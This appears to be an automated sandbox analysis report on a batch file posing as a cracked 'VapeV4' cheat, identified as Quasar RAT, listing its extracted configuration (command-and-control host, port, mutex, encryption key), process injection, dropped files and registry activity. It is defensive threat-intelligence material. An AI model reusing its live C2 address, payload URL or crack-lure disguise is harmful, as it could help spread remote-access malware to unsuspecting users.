quasar | hxxps://raw[.]githubusercontent[.]com/insomniastealer/vapev4-crack/main/VapeV4-cracked[.]bat

Resubmissions

Analysis

max time kernel
40s
max time network
41s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
03-06-2024 18:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat

Score

10^/10

quasar v15.6.7 | gottermed spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v15.6.7 | GotTermed

elated-grass-07331.pktriot.net:22233

Mutex

3c4f9f0f-6b9b-4427-95ce-8191fe249b5a

Attributes

encryption_key
2625A64B59BF89EF5DAC76FF4DD28779A4574274
install_name
.exe
log_directory
$sxr-Logs
reconnect_delay
3000
startup_key
$sxr-seroxen

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3416-205-0x000001B19BAC0000-0x000001B19C280000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

VapeV4-cracked.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 1204 created 612	1204	VapeV4-cracked.bat.exe	winlogon.exe
PID 3416 created 612	3416	$sxr-powershell.exe	winlogon.exe
PID 3416 created 612	3416	$sxr-powershell.exe	winlogon.exe

Executes dropped EXE 3 IoCs

Processes:

VapeV4-cracked.bat.exe$sxr-powershell.exe$sxr-powershell.exe

pid process

1204 VapeV4-cracked.bat.exe
3416 $sxr-powershell.exe
660 $sxr-powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

4 raw.githubusercontent.com
8 raw.githubusercontent.com

pid	process
1204	VapeV4-cracked.bat.exe
3416	$sxr-powershell.exe
660	$sxr-powershell.exe

flow	ioc
4	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in System32 directory 11 IoCs

Processes:

svchost.exeVapeV4-cracked.bat.exe$sxr-powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	VapeV4-cracked.bat.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	VapeV4-cracked.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	VapeV4-cracked.bat.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File created	C:\Windows\System32\ucrtbased.dll	VapeV4-cracked.bat.exe
File created	C:\Windows\System32\vcruntime140d.dll	VapeV4-cracked.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	VapeV4-cracked.bat.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

VapeV4-cracked.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 1204 set thread context of 3792	1204	VapeV4-cracked.bat.exe	dllhost.exe
PID 3416 set thread context of 1300	3416	$sxr-powershell.exe	dllhost.exe
PID 3416 set thread context of 632	3416	$sxr-powershell.exe	dllhost.exe

Drops file in Windows directory 8 IoCs

Processes:

cmd.exeVapeV4-cracked.bat.exe

description	ioc	process
File opened for modification	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe
File created	C:\Windows\$sxr-powershell.exe	VapeV4-cracked.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	VapeV4-cracked.bat.exe
File created	C:\Windows\$sxr-mshta.exe	VapeV4-cracked.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	VapeV4-cracked.bat.exe
File created	C:\Windows\$sxr-cmd.exe	VapeV4-cracked.bat.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	VapeV4-cracked.bat.exe
File created	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 56 IoCs

Processes:

msedge.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000096c7af35d697da0165473838d697da0129c8fb38d697da0114000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exemsedge.exeVapeV4-cracked.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exedllhost.exe

pid	process
1020	msedge.exe
1020	msedge.exe
2308	msedge.exe
2308	msedge.exe
2600	msedge.exe
2600	msedge.exe
1204	VapeV4-cracked.bat.exe
1204	VapeV4-cracked.bat.exe
1204	VapeV4-cracked.bat.exe
3792	dllhost.exe
3792	dllhost.exe
3792	dllhost.exe
3792	dllhost.exe
1204	VapeV4-cracked.bat.exe
1204	VapeV4-cracked.bat.exe
3416	$sxr-powershell.exe
3416	$sxr-powershell.exe
3416	$sxr-powershell.exe
3416	$sxr-powershell.exe
1300	dllhost.exe
1300	dllhost.exe
1300	dllhost.exe
1300	dllhost.exe
3416	$sxr-powershell.exe
3416	$sxr-powershell.exe
660	$sxr-powershell.exe
660	$sxr-powershell.exe
3416	$sxr-powershell.exe
632	dllhost.exe
632	dllhost.exe
660	$sxr-powershell.exe
660	$sxr-powershell.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

msedge.exe

pid process

2308 msedge.exe
2308 msedge.exe
2308 msedge.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

VapeV4-cracked.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exedllhost.exe

description	pid	process
Token: SeDebugPrivilege	1204	VapeV4-cracked.bat.exe
Token: SeDebugPrivilege	1204	VapeV4-cracked.bat.exe
Token: SeDebugPrivilege	3792	dllhost.exe
Token: SeDebugPrivilege	3416	$sxr-powershell.exe
Token: SeDebugPrivilege	3416	$sxr-powershell.exe
Token: SeDebugPrivilege	1300	dllhost.exe
Token: SeDebugPrivilege	660	$sxr-powershell.exe
Token: SeDebugPrivilege	3416	$sxr-powershell.exe
Token: SeDebugPrivilege	632	dllhost.exe

Suspicious use of FindShellTrayWindow 31 IoCs

Processes:

msedge.exe

pid	process
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

msedge.exe$sxr-powershell.exe

pid process

2600 msedge.exe
3416 $sxr-powershell.exe

pid	process
2600	msedge.exe
3416	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2308 wrote to memory of 2656	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 2656	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 3936	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 1020	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 1020	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe
PID 2308 wrote to memory of 4564	2308	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:336

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7d0dcb43-b0b1-449d-b3ca-1afdfc87b349}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1531fde5-f422-4287-9f31-d96ec09f8af0}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3d6a3d88-7e64-426d-b795-456c1f759727}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1096

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1184

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1568

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1720

C:\Windows\System32\svchost.exe
